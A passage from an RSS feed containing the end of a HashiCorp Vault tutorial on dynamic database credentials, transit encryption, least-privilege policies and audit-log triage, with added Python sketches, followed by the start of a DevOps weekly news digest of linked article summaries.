    connection_url=<span class="hljs-string">&quot;postgresql://{{username}}:{{password}}@db.internal:5432/orders?sslmode=require&quot;</span> \
    username=<span class="hljs-string">&quot;vault-admin&quot;</span> \
    password=<span class="hljs-string">&quot;<span class="hljs-variable">$ROOT_DB_PASSWORD</span>&quot;</span>
</code></pre><p>The <code>vault-admin</code> account is the only static credential, and it is a privileged account Vault uses to create and drop other users. Now define a role that says what a generated user is allowed to do:</p>
<pre><code class="hljs language-bash">vault write database/roles/orders-readonly \
    db_name=<span class="hljs-string">&quot;orders-db&quot;</span> \
    creation_statements=<span class="hljs-string">&quot;CREATE ROLE \&quot;{{name}}\&quot; WITH LOGIN PASSWORD &#x27;{{password}}&#x27; VALID UNTIL &#x27;{{expiration}}&#x27;; \
      GRANT SELECT ON ALL TABLES IN SCHEMA public TO \&quot;{{name}}\&quot;;&quot;</span> \
    default_ttl=<span class="hljs-string">&quot;1h&quot;</span> \
    max_ttl=<span class="hljs-string">&quot;24h&quot;</span>
</code></pre><p>Ask for credentials:</p>
<pre><code class="hljs language-bash">vault <span class="hljs-built_in">read</span> database/creds/orders-readonly
</code></pre><pre><code class="hljs language-text">Key                Value
---                -----
lease_id           database/creds/orders-readonly/Qm9iY...
lease_duration     1h
lease_renewable    true
password           A1a-9Zx2Kp4Lq7Rt0Vn3
username           v-approle-orders-rea-x7Qd2bN9
</code></pre><p>That <code>username</code> did not exist a second ago. Run the command again and you get a different user with a different password. Each service instance, each request if you want, gets its own credentials. When the lease ends, Vault runs the revocation statement and the user is gone from PostgreSQL.</p>
<p>Here is why this matters in numbers. A static password sits valid until a human rotates it, which in practice means months or years. A dynamic credential with a one-hour TTL is useless to an attacker an hour after it leaks.</p>
<div class="post-chart not-prose" data-chart="{&quot;type&quot;:&quot;bar&quot;,&quot;title&quot;:&quot;How long a leaked credential stays valid&quot;,&quot;unit&quot;:&quot;hours&quot;,&quot;caption&quot;:&quot;Static password assumes a generous 180-day rotation cycle (4320 hours); most teams rotate far less often. Dynamic creds use the 1h default_ttl from the role above.&quot;,&quot;rows&quot;:[{&quot;label&quot;:&quot;Static shared password&quot;,&quot;value&quot;:4320,&quot;series&quot;:&quot;Static&quot;},{&quot;label&quot;:&quot;Vault dynamic credential&quot;,&quot;value&quot;:1,&quot;series&quot;:&quot;Dynamic&quot;}],&quot;series&quot;:[{&quot;name&quot;:&quot;Static&quot;,&quot;color&quot;:&quot;#ef4444&quot;},{&quot;name&quot;:&quot;Dynamic&quot;,&quot;color&quot;:&quot;#10b981&quot;}]}"></div><p>The shrink in exposure window is the entire reason to run Vault. If you take one thing from this post, make it this section.</p>
<h2 id="h2-encryption-as-a-service-with-the-transit-engine" class="group relative scroll-mt-24">
        <a href="#h2-encryption-as-a-service-with-the-transit-engine" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Encryption as a service with the transit engine
        </a>
        </h2><p>Sometimes you do not want to store a secret, you want to encrypt application data: a customer&#39;s tax ID, a token, a column in your database. The wrong move is to ship an AES key to every app and hope nobody loses it. The transit engine keeps the key inside Vault and exposes encrypt and decrypt operations. Your app sends plaintext and gets ciphertext back. It never sees the key.</p>
<pre><code class="hljs language-bash">vault secrets <span class="hljs-built_in">enable</span> transit
vault write -f transit/keys/orders-pii
</code></pre><p>Encrypt some data (transit takes base64 input):</p>
<pre><code class="hljs language-bash">vault write transit/encrypt/orders-pii \
    plaintext=$(<span class="hljs-built_in">echo</span> -n <span class="hljs-string">&quot;4111-1111-1111-1111&quot;</span> | <span class="hljs-built_in">base64</span>)
</code></pre><pre><code class="hljs language-text">Key            Value
---            -----
ciphertext     vault:v1:8SDd4HCQ9p7Hf2bxN0kZ...
key_version    1
</code></pre><p>Store <code>vault:v1:8SDd...</code> in your database. To read it back:</p>
<pre><code class="hljs language-bash">vault write transit/decrypt/orders-pii \
    ciphertext=<span class="hljs-string">&quot;vault:v1:8SDd4HCQ9p7Hf2bxN0kZ...&quot;</span>
</code></pre><pre><code class="hljs language-text">Key          Value
---          -----
plaintext    NDExMS0xMTExLTExMTEtMTExMQ==
</code></pre><p>Base64-decode that and you are back to the card number. The <code>v1</code> prefix is the key version, which means you can rotate the key with <code>vault write -f transit/keys/orders-pii/rotate</code> and old ciphertext still decrypts while new writes use the fresh key. No key ever leaves Vault, so an app compromise leaks data the app could already see, not the key that protects all of it.</p>
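<p>From the app's point of view, AppRole login, dynamic database credentials and transit are one flow. The sketch below is an added example, not code from the original post or from Vault: the endpoint paths and response fields follow Vault's HTTP API, while <code>VaultSession</code>, the injectable <code>send</code> transport, the two-thirds refresh rule and the in-memory <code>fake_vault</code> stand-in (so it runs offline) are assumptions.</p>

```python
import base64
import json
import time
import urllib.request


def http_send(addr):
    """Transport for a real Vault at `addr`, e.g. https://vault-1.internal:8200."""
    def send(method, path, token=None, body=None):
        req = urllib.request.Request(
            addr + "/v1/" + path, method=method,
            data=None if body is None else json.dumps(body).encode(),
            headers={"X-Vault-Token": token} if token else {})
        with urllib.request.urlopen(req, timeout=10) as resp:
            return json.load(resp)
    return send


class VaultSession:
    """App-side flow: AppRole login, dynamic DB creds, transit encrypt/decrypt."""

    def __init__(self, send, clock=time.time):
        self.send, self.clock = send, clock
        self.token, self.token_expires_at = None, 0.0

    def login(self, role_id, secret_id):
        auth = self.send("POST", "auth/approle/login",
                         body={"role_id": role_id, "secret_id": secret_id})["auth"]
        self.token = auth["client_token"]
        # Renew or log in again before this moment; the token is dead after it.
        self.token_expires_at = self.clock() + auth["lease_duration"]
        return auth["policies"]

    def db_credentials(self, role):
        resp = self.send("GET", "database/creds/" + role, token=self.token)
        return {
            "username": resp["data"]["username"],
            "password": resp["data"]["password"],
            "lease_id": resp["lease_id"],
            # Assumption of this sketch: fetch a replacement at two thirds of the
            # lease so the app never holds a user Vault has already dropped.
            "refresh_at": self.clock() + resp["lease_duration"] * 2 / 3,
        }

    def encrypt(self, key, text):
        b64 = base64.b64encode(text.encode()).decode()  # transit takes base64
        resp = self.send("POST", "transit/encrypt/" + key, token=self.token,
                         body={"plaintext": b64})
        return resp["data"]["ciphertext"]  # store this string, never the key

    def decrypt(self, key, ciphertext):
        resp = self.send("POST", "transit/decrypt/" + key, token=self.token,
                         body={"ciphertext": ciphertext})
        return base64.b64decode(resp["data"]["plaintext"]).decode()


def fake_vault():
    """Constructed in-memory stand-in so the flow runs offline. It is not Vault:
    its 'ciphertext' is only the base64 input behind a vault:v1: prefix."""
    used_secret_ids, issued = set(), []

    def send(method, path, token=None, body=None):
        if path == "auth/approle/login":
            if body["secret_id"] in used_secret_ids:  # secret_id_num_uses=1
                raise PermissionError("invalid secret id")
            used_secret_ids.add(body["secret_id"])
            return {"auth": {"client_token": "hvs.constructed",
                             "lease_duration": 3600,
                             "policies": ["default", "payments-api"]}}
        if token != "hvs.constructed":
            raise PermissionError("permission denied")
        if path == "database/creds/orders-readonly":
            issued.append("v-approle-orders-rea-%04d" % len(issued))
            return {"lease_id": "%s/constructed-%d" % (path, len(issued)),
                    "lease_duration": 3600,
                    "data": {"username": issued[-1], "password": "constructed"}}
        if path == "transit/encrypt/orders-pii":
            return {"data": {"ciphertext": "vault:v1:" + body["plaintext"]}}
        if path == "transit/decrypt/orders-pii":
            return {"data": {"plaintext": body["ciphertext"].split(":", 2)[2]}}
        raise PermissionError("permission denied")  # outside the policy

    return send


def demo():
    """Run the whole flow against the stand-in with a frozen clock."""
    app = VaultSession(fake_vault(), clock=lambda: 1000.0)
    policies = app.login("constructed-role-id", "constructed-secret-id")
    first = app.db_credentials("orders-readonly")
    second = app.db_credentials("orders-readonly")
    stored = app.encrypt("orders-pii", "4111-1111-1111-1111")
    return policies, first, second, stored, app.decrypt("orders-pii", stored)


if __name__ == "__main__":
    for part in demo():
        print(part)
```

<p>Against a real server, build the session with <code>VaultSession(http_send(addr))</code>; a second login with the same <code>secret_id</code> then fails the same way the stand-in does.</p>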
<h2 id="h2-least-privilege-policies-and-the-audit-log" class="group relative scroll-mt-24">
        <a href="#h2-least-privilege-policies-and-the-audit-log" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Least-privilege policies and the audit log
        </a>
        </h2><p>Tokens are only as safe as the policy attached to them. The <code>payments-api</code> policy referenced earlier should grant exactly what the service needs and nothing more:</p>
<pre><code class="hljs language-hcl"><span class="hljs-comment"># payments-api.hcl</span>
<span class="hljs-comment"># Read dynamic DB creds for the orders database.</span>
path <span class="hljs-string">&quot;database/creds/orders-readonly&quot;</span> {
  capabilities = [<span class="hljs-string">&quot;read&quot;</span>]
}

<span class="hljs-comment"># Encrypt and decrypt PII, but not manage or export the key.</span>
path <span class="hljs-string">&quot;transit/encrypt/orders-pii&quot;</span> {
  capabilities = [<span class="hljs-string">&quot;update&quot;</span>]
}
path <span class="hljs-string">&quot;transit/decrypt/orders-pii&quot;</span> {
  capabilities = [<span class="hljs-string">&quot;update&quot;</span>]
}
</code></pre><pre><code class="hljs language-bash">vault policy write payments-api payments-api.hcl
</code></pre><p>Notice what is missing. No <code>database/creds/orders-admin</code>, no <code>transit/keys/*</code> management, no wildcard paths. If the payments token leaks, the attacker can read orders and decrypt PII for an hour, and that is the ceiling. When a request asks for something outside the policy, Vault refuses:</p>
<pre><code class="hljs language-text">$ vault read database/creds/orders-admin
Error reading database/creds/orders-admin: Error making API request.
URL: GET https://vault-1.internal:8200/v1/database/creds/orders-admin
Code: 403. Errors:
* 1 error occurred:
	* permission denied
</code></pre><p>Turn on the audit log before you put anything real in Vault. It records every request and response (secrets are HMAC&#39;d, not stored in clear) so you can answer &quot;who read this secret and when&quot; during an incident:</p>
<pre><code class="hljs language-bash">vault audit <span class="hljs-built_in">enable</span> file file_path=/var/log/vault/audit.log
</code></pre><p>And when you do have an incident, dynamic secrets give you a clean kill switch. Revoke every credential a database role ever issued in one command:</p>
<pre><code class="hljs language-bash">vault lease revoke -prefix database/creds/orders-readonly
</code></pre><pre><code class="hljs language-text">All revocation operations queued successfully!
</code></pre><p>Every dynamic user that role created gets dropped from the database. Try doing that with a shared password that lives in forty places.</p>
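<p>An added example (not from the original post) of answering &quot;who read this secret and when&quot; from the file audit device's JSON lines. The log lines are constructed in the shape of Vault's audit entries; the helper names, the <code>reports</code> role and the multi-address heuristic are assumptions.</p>

```python
import json
from collections import defaultdict

DENIED = "1 error occurred:\n\t* permission denied\n\n"


def _line(when, role, accessor, addr, op, path, error="", kind="response"):
    """Build one constructed line in the shape Vault's file audit device writes."""
    return json.dumps({
        "time": when, "type": kind, "error": error,
        "auth": {"accessor": accessor, "display_name": "approle",
                 "policies": ["default", role], "metadata": {"role_name": role}},
        "request": {"operation": op, "path": path, "remote_address": addr},
    })


# Constructed sample: accessors, addresses, times and the "reports" role are made up.
SAMPLE_LOG = [
    _line("2026-06-30T09:14:02Z", "payments-api", "hmac-sha256:aa11", "10.0.4.17",
          "read", "database/creds/orders-readonly", kind="request"),
    _line("2026-06-30T09:14:02Z", "payments-api", "hmac-sha256:aa11", "10.0.4.17",
          "read", "database/creds/orders-readonly"),
    _line("2026-06-30T09:14:05Z", "payments-api", "hmac-sha256:aa11", "10.0.4.17",
          "update", "transit/encrypt/orders-pii"),
    _line("2026-06-30T09:41:55Z", "payments-api", "hmac-sha256:aa11", "10.0.9.200",
          "read", "database/creds/orders-readonly"),
    _line("2026-06-30T09:42:01Z", "payments-api", "hmac-sha256:aa11", "10.0.9.200",
          "read", "database/creds/orders-admin", error=DENIED),
    _line("2026-06-30T10:02:10Z", "reports", "hmac-sha256:bb22", "10.0.5.3",
          "read", "database/creds/orders-readonly"),
    '{"time":"2026-06-30T10:02:11Z","type":"resp',  # truncated write
]


def parse(lines):
    """Return response entries; skip request halves and lines that are not JSON."""
    entries = []
    for line in lines:
        try:
            entry = json.loads(line)
        except json.JSONDecodeError:
            continue
        if isinstance(entry, dict) and entry.get("type") == "response":
            entries.append(entry)
    return entries


def _fields(entry):
    """Pull the triage fields out of one entry, tolerating null sub-objects."""
    auth, req = entry.get("auth") or {}, entry.get("request") or {}
    role = (auth.get("metadata") or {}).get("role_name") or auth.get("display_name")
    return (entry.get("time"), role, auth.get("accessor"),
            req.get("remote_address"), req.get("operation"), req.get("path"))


def who_read(entries, path):
    """Successful reads of one secret path: (time, role, accessor, address)."""
    out = []
    for entry in entries:
        when, role, accessor, addr, op, req_path = _fields(entry)
        if req_path == path and op == "read" and not entry.get("error"):
            out.append((when, role, accessor, addr))
    return out


def denied(entries):
    """Requests Vault refused: (time, role, address, path)."""
    out = []
    for entry in entries:
        when, role, _, addr, _, path = _fields(entry)
        if "permission denied" in (entry.get("error") or ""):
            out.append((when, role, addr, path))
    return out


def multi_address_tokens(entries):
    """Heuristic of this sketch: one token accessor seen from several addresses
    can mean a copied token (or just a NAT or rescheduled pod), so review it."""
    seen = defaultdict(set)
    for entry in entries:
        _, _, accessor, addr, _, _ = _fields(entry)
        if accessor and addr:
            seen[accessor].add(addr)
    return {acc: sorted(addrs) for acc, addrs in seen.items() if len(addrs) > 1}


if __name__ == "__main__":
    log = parse(SAMPLE_LOG)
    print(who_read(log, "database/creds/orders-readonly"))
    print(denied(log))
    print(multi_address_tokens(log))
```

<p>The accessor values in the log are HMACs, so they identify a token consistently across entries without revealing it.</p>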
<h2 id="h2-where-to-go-next" class="group relative scroll-mt-24">
        <a href="#h2-where-to-go-next" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Where to go next
        </a>
        </h2><p>You now have the shape of a real Vault setup: a sealed, persistent server; AppRole for machines; dynamic database credentials; transit for encryption; tight policies; and an audit trail. The static KV store is still there when you need it, but it should be the exception, not the default.</p>
<p>Concrete next steps:</p>
<ol>
<li><strong>Replace one static database password with a dynamic role this week.</strong> Pick a low-risk read-only service and cut over. Seeing credentials expire on their own is what makes the model click.</li>
<li><strong>Stand up a 3-node Raft cluster</strong>, not a single server. One Vault node is a single point of failure for every secret you own. Run <code>vault operator raft list-peers</code> to confirm the cluster.</li>
<li><strong>Deploy Vault Agent</strong> to handle AppRole login and token renewal so your apps read a rendered file or env var instead of calling the Vault API directly.</li>
<li><strong>Set short TTLs and test revocation.</strong> Run <code>vault lease revoke -prefix</code> against a staging role and confirm the users vanish from your database. Know the command works before you need it at 2am.</li>
<li><strong>Ship the audit log to your SIEM</strong> so secret access shows up next to the rest of your security telemetry.</li>
</ol>
<p>Start with step one. Turning a single forever-password into a one-hour credential is the smallest change that removes the largest class of secret leaks you have.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[DevOps Weekly Digest - Week 26, 2026]]></title>
      <link>https://devops-daily.com/news/2026-week-26</link>
      <description><![CDATA[⚡ Curated updates from Kubernetes, cloud native tooling, CI/CD, IaC, observability, and security - handpicked for DevOps professionals!]]></description>
      <pubDate>Mon, 22 Jun 2026 00:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/news/2026-week-26</guid>
      <category><![CDATA[DevOps News]]></category>
      <content:encoded><![CDATA[<blockquote>
<p>📌 <strong>Handpicked by DevOps Daily</strong> - Your weekly dose of curated DevOps news and updates!</p>
</blockquote>
<hr>
<h2 id="h2-kubernetes" class="group relative scroll-mt-24">
        <a href="#h2-kubernetes" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          ⚓ Kubernetes
        </a>
        </h2><h3 id="h3-introducing-project-navigator-from-ai-intent-to-optimized-deployment-on-red-hat-openshift-ai" class="group relative scroll-mt-24">
        <a href="#h3-introducing-project-navigator-from-ai-intent-to-optimized-deployment-on-red-hat-openshift-ai" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Introducing Project Navigator: From AI intent to optimized deployment on Red Hat OpenShift AI
        </a>
        </h3><p>You&#39;ve picked a model. Maybe it&#39;s a 70 billion parameter large model because someone on the team saw it top a leaderboard. Now you need it running in production on your Red Hat OpenShift AI cluster. S</p>
<p><strong>📅 Jun 22, 2026</strong> • <strong>📰 Red Hat Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/introducing-project-navigator-ai-intent-optimized-deployment-red-hat-openshift-ai"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-scaling-ray-serve-llm-on-gke-performance-without-losing-the-developer-experience" class="group relative scroll-mt-24">
        <a href="#h3-scaling-ray-serve-llm-on-gke-performance-without-losing-the-developer-experience" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Scaling Ray Serve LLM on GKE: Performance without losing the developer experience
        </a>
        </h3><p>Developers looking for LLM inference and model serving often turn to Ray Serve, a scalable model serving library with developer-friendly, Python-native APIs built by Anyscale. Combined with Google Kub</p>
<p><strong>📅 Jun 18, 2026</strong> • <strong>📰 Google Cloud Blog</strong></p>
<p><a href="https://cloud.google.com/blog/products/containers-kubernetes/improving-ray-serve-llm-on-gke-throughput-latency/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-why-cloud-native-belongs-at-the-heart-of-agentic-ai-lessons-from-building-a-multi-agent-security-platform-on-kubernetes" class="group relative scroll-mt-24">
        <a href="#h3-why-cloud-native-belongs-at-the-heart-of-agentic-ai-lessons-from-building-a-multi-agent-security-platform-on-kubernetes" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Why cloud native belongs at the heart of agentic AI: Lessons from building a multi-agent security platform on Kubernetes
        </a>
        </h3><p>In March, I gave a talk at KubeCon + CloudNativeCon Europe 2026 in Amsterdam. After the session, the same questions kept coming up on the CNCF Slack and in person: why build agentic AI on cloud...</p>
<p><strong>📅 Jun 17, 2026</strong> • <strong>📰 CNCF Blog</strong></p>
<p><a href="https://www.cncf.io/blog/2026/06/17/why-cloud-native-belongs-at-the-heart-of-agentic-ai-lessons-from-building-a-multi-agent-security-platform-on-kubernetes/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-cloud-native" class="group relative scroll-mt-24">
        <a href="#h2-cloud-native" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          ☁️ Cloud Native
        </a>
        </h2><h3 id="h3-expanding-care-passing-cks-can-now-extend-your-cka-certification" class="group relative scroll-mt-24">
        <a href="#h3-expanding-care-passing-cks-can-now-extend-your-cka-certification" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Expanding CARE: Passing CKS can now extend your CKA certification
        </a>
        </h3><p>A few months ago, CNCF introduced the CARE Program — Certification Advancement &amp; Recertification Experience — to make it easier for certified professionals to keep their credentials current as they co</p>
<p><strong>📅 Jun 18, 2026</strong> • <strong>📰 CNCF Blog</strong></p>
<p><a href="https://www.cncf.io/blog/2026/06/17/expanding-care-passing-cks-can-now-extend-your-cka-certification/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-docker-content-trust-retirement-and-migration-guidance" class="group relative scroll-mt-24">
        <a href="#h3-docker-content-trust-retirement-and-migration-guidance" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Docker Content Trust: Retirement and Migration Guidance
        </a>
        </h3><p>TLDR: Docker Content Trust (DCT) and the Notary v1 service at notary.docker.io are being fully retired (first announced in July of 2025). This blog explains what is changing, who is affected, and how </p>
<p><strong>📅 Jun 16, 2026</strong> • <strong>📰 Docker Blog</strong></p>
<p><a href="https://www.docker.com/blog/docker-content-trust-retirement-and-migration-guidance/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-from-data-residency-to-digital-sovereignty-architectural-patterns-for-cloud-native-platforms" class="group relative scroll-mt-24">
        <a href="#h3-from-data-residency-to-digital-sovereignty-architectural-patterns-for-cloud-native-platforms" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 From data residency to digital sovereignty: Architectural patterns for cloud native platforms
        </a>
        </h3><p>Over the past two years, digital sovereignty has evolved from a policy discussion into a practical platform engineering concern. The EU Data Act has been fully applicable since January 11, 2025. NIS-2</p>
<p><strong>📅 Jun 16, 2026</strong> • <strong>📰 CNCF Blog</strong></p>
<p><a href="https://www.cncf.io/blog/2026/06/16/from-data-residency-to-digital-sovereignty-architectural-patterns-for-cloud-native-platforms/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-docker-joins-the-athena-coalition-a-cross-industry-collaboration-for-supply-chain-security" class="group relative scroll-mt-24">
        <a href="#h3-docker-joins-the-athena-coalition-a-cross-industry-collaboration-for-supply-chain-security" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Docker joins the Athena coalition: a cross-industry collaboration for supply chain security
        </a>
        </h3><p>The obvious takeaway from 2026&#39;s biggest incidents is that attackers are increasingly using AI to move fast. Docker&#39;s CISO, Mark Lechner, wrote about this shift and what every engineering team should </p>
<p><strong>📅 Jun 15, 2026</strong> • <strong>📰 Docker Blog</strong></p>
<p><a href="https://www.docker.com/blog/docker-joins-the-athena-coalition-a-cross-industry-collaboration-for-supply-chain-security/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-cicd" class="group relative scroll-mt-24">
        <a href="#h2-cicd" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          🔄 CI/CD
        </a>
        </h2><h3 id="h3-aws-image-builder-plugin-for-teamcity" class="group relative scroll-mt-24">
        <a href="#h3-aws-image-builder-plugin-for-teamcity" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 AWS Image Builder Plugin for TeamCity
        </a>
        </h3><p>Cloud build agents are one of those CI/CD features that feel almost magical when everything works well. Your TeamCity server can scale build capacity up when the queue gets busy, then wind it back dow</p>
<p><strong>📅 Jun 22, 2026</strong> • <strong>📰 JetBrains Blog</strong></p>
<p><a href="https://blog.jetbrains.com/teamcity/2026/06/teamcity-aws-ami-builder/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-harness-mcp-server-now-connects-google-antigravity-ide" class="group relative scroll-mt-24">
        <a href="#h3-harness-mcp-server-now-connects-google-antigravity-ide" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Harness MCP Server Now Connects Google Antigravity IDE
        </a>
        </h3><p>Connect Harness MCP Server inside Google Antigravity to let AI agents inspect pipelines, debug deployments, trigger approved runs, and act on real-time delivery context with RBAC, audit logs, and huma</p>
<p><strong>📅 Jun 22, 2026</strong> • <strong>📰 Harness Blog</strong></p>
<p><a href="https://www.harness.io/blog/harness-delivery-intelligence-now-inside-antigravity"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-feature-flags-were-always-important-sre-agents-make-them-essential" class="group relative scroll-mt-24">
        <a href="#h3-feature-flags-were-always-important-sre-agents-make-them-essential" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Feature Flags Were Always Important. SRE Agents Make Them Essential.
        </a>
        </h3><p>AI-powered SRE agents are getting very good at identifying when something is wrong in production. What they haven&#39;t solved, however, and what most teams have dramatically underinvested in, is what hap</p>
<p><strong>📅 Jun 19, 2026</strong> • <strong>📰 LaunchDarkly Blog</strong></p>
<p><a href="https://launchdarkly.com/blog/feature-flags-aws-devops-agent/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-how-we-built-an-internal-data-analytics-agent" class="group relative scroll-mt-24">
        <a href="#h3-how-we-built-an-internal-data-analytics-agent" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 How we built an internal data analytics agent
        </a>
        </h3><p>Qubot, our internal Copilot-powered analytics agent, allows any GitHub employee to ask questions about our data in plain language. Here&#39;s what we learned as we built it. The post How we built an inter</p>
<p><strong>📅 Jun 19, 2026</strong> • <strong>📰 GitHub Blog</strong></p>
<p><a href="https://github.blog/ai-and-ml/github-copilot/how-we-built-an-internal-data-analytics-agent/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-bamboo-end-of-life-how-to-prepare-and-choose-the-right-cicd-replacement" class="group relative scroll-mt-24">
        <a href="#h3-bamboo-end-of-life-how-to-prepare-and-choose-the-right-cicd-replacement" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Bamboo End of Life: How to Prepare and Choose the Right CI/CD Replacement
        </a>
        </h3><p>If your team is using Bamboo, you’ve probably seen the news: Bamboo Data Center is being retired as part of Atlassian’s broader Data Center transition strategy. Support will continue for several years</p>
<p><strong>📅 Jun 19, 2026</strong> • <strong>📰 JetBrains Blog</strong></p>
<p><a href="https://blog.jetbrains.com/teamcity/2026/06/bamboo-end-of-life/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-how-pull-request-limits-are-cutting-down-the-noise" class="group relative scroll-mt-24">
        <a href="#h3-how-pull-request-limits-are-cutting-down-the-noise" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 How pull request limits are cutting down the noise
        </a>
        </h3><p>Learn how pull request limits can help manage contribution volume in your repositories, and see what’s next on the roadmap. The post How pull request limits are cutting down the noise appeared first o</p>
<p><strong>📅 Jun 18, 2026</strong> • <strong>📰 GitHub Blog</strong></p>
<p><a href="https://github.blog/open-source/maintainers/how-pull-request-limits-are-cutting-down-the-noise/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-one-vulnerability-view-from-scanner-coverage-to-ai-governance" class="group relative scroll-mt-24">
        <a href="#h3-one-vulnerability-view-from-scanner-coverage-to-ai-governance" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 One vulnerability view: From scanner coverage to AI governance
        </a>
        </h3><p>Most enterprises use a handful of different security scanners, each configured and enforced, project by project. With no single view of what scanners run where, policies drift, blind spots go undetect</p>
<p><strong>📅 Jun 18, 2026</strong> • <strong>📰 GitLab Blog</strong></p>
<p><a href="https://about.gitlab.com/blog/one-vulnerability-view/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-gitlab-191-released" class="group relative scroll-mt-24">
        <a href="#h3-gitlab-191-released" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 GitLab 19.1 released
        </a>
        </h3><p><strong>📅 Jun 18, 2026</strong> • <strong>📰 GitLab Blog</strong></p>
<p><a href="https://docs.gitlab.com/releases/19/gitlab-19-1-released/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-ai-catalog-updates-for-governance-and-operations" class="group relative scroll-mt-24">
        <a href="#h3-ai-catalog-updates-for-governance-and-operations" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 AI Catalog updates for governance and operations
        </a>
        </h3><p>Enterprise AI adoption often stalls not because the technology isn&#39;t ready, but because admins can&#39;t answer the question their security team is asking: What&#39;s actually running in our environment, and </p>
<p><strong>📅 Jun 18, 2026</strong> • <strong>📰 GitLab Blog</strong></p>
<p><a href="https://about.gitlab.com/blog/ai-catalog-updates-for-governance-and-operations/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-getting-more-from-each-token-how-copilot-improves-context-handling-and-model-routing" class="group relative scroll-mt-24">
        <a href="#h3-getting-more-from-each-token-how-copilot-improves-context-handling-and-model-routing" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Getting more from each token: How Copilot improves context handling and model routing
        </a>
        </h3><p>How GitHub Copilot is making more of each session go toward useful work, so your credits go further. The post Getting more from each token: How Copilot improves context handling and model routing appe</p>
<p><strong>📅 Jun 17, 2026</strong> • <strong>📰 GitHub Blog</strong></p>
<p><a href="https://github.blog/ai-and-ml/github-copilot/getting-more-from-each-token-how-copilot-improves-context-handling-and-model-routing/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-gitlab-named-a-leader-in-the-2026-gartner-magic-quadrant-for-devsecops-platforms" class="group relative scroll-mt-24">
        <a href="#h3-gitlab-named-a-leader-in-the-2026-gartner-magic-quadrant-for-devsecops-platforms" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 GitLab named a Leader in the 2026 Gartner® Magic Quadrant™ for DevSecOps Platforms
        </a>
        </h3><p>For the fourth year running, Gartner has named GitLab a Leader in the 2026 Gartner® Magic Quadrant™ for DevSecOps Platforms. We believe this recognition reflects what our customers already see: The wo</p>
<p><strong>📅 Jun 17, 2026</strong> • <strong>📰 GitLab Blog</strong></p>
<p><a href="https://about.gitlab.com/blog/gitlab-leader-2026-gartner-mq-devsecops-platforms/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-harness-named-a-leader-in-the-2026-gartner-magic-quadrant" class="group relative scroll-mt-24">
        <a href="#h3-harness-named-a-leader-in-the-2026-gartner-magic-quadrant" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Harness Named a Leader in the 2026 Gartner® Magic Quadrant™
        </a>
        </h3><p>Harness has been named a Leader in the 2026 Gartner® Magic Quadrant™ for DevSecOps Platforms for the third consecutive year and positioned furthest in Completeness of Vision.</p>
<p><strong>📅 Jun 17, 2026</strong> • <strong>📰 Harness Blog</strong></p>
<p><a href="https://www.harness.io/blog/harness-leader-2026-gartner-magic-quadrant-devsecops-platforms"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-iac" class="group relative scroll-mt-24">
        <a href="#h2-iac" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          🏗️ IaC
        </a>
        </h2><h3 id="h3-amazon-msk-express-brokers-now-support-intelligent-rebalancing-on-existing-clusters" class="group relative scroll-mt-24">
